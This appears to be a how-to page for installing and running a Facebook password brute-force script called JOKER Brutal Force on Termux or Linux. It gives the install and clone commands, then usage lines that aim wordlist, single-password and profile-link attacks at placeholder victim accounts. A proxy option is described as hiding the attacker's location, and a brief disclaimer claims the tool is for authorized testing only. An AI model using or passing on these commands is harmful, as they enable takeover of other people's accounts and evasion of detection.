JOKER Brutal Force is a Python script that tests Facebook account passwords using a brute force attack method. It tries different passwords from a wordlist to check if any of them work on a target account. You can run this tool on Termux, Kali Linux, or any system that has Python installed. Use it to test your own Facebook account strength or for authorized security assessments only.
Install Joker Brute in Termux
Below are the simple steps to install and run Joker Brute on Android using Termux. Open Termux and run the commands one by one.
Update Termux packages first:
apt updateInstall Git package:
apt install git -yInstall Python, Python2 and required libraries:
pkg install python python2 && pip install requests mechanizeClone Joker Brute repository from GitHub:
git clone https://github.com/fikrado/JOKER-burtal-forceNavigate into the Joker Brute directory:
cd JOKER-burtal-forceRun the tool to see the menu:
python joker.pyUsage commands
After installation, you can use different commands to simulate attacks. Below are the usage examples.
Attack using email and wordlist file:
python joker.py -t Victim@gmail.com -w /wordlists/rockyou.txtAttack using Facebook ID and custom wordlist path:
python joker.py -t 100001013078780 -w wordlist_file.txtAttack using email, wordlist, and proxy server:
python joker.py -t Victim@hotmail.com -w wordlist.txt -p 144.217.101.245:3129Attack using email and single password:
python joker.py -t Victim@gmail.com -s 1234567Attack using Facebook profile link:
python joker.py -g https://www.facebook.com/Victim_ProfileUnderstanding the Commands
| Command | What it does |
| -t | Target email, phone number, or Facebook ID. |
| -w | Path to wordlist file containing passwords. |
| -p | Proxy server address for hiding your location. |
| -s | Single password to test against the account. |
| -g | Facebook profile link of the target. |



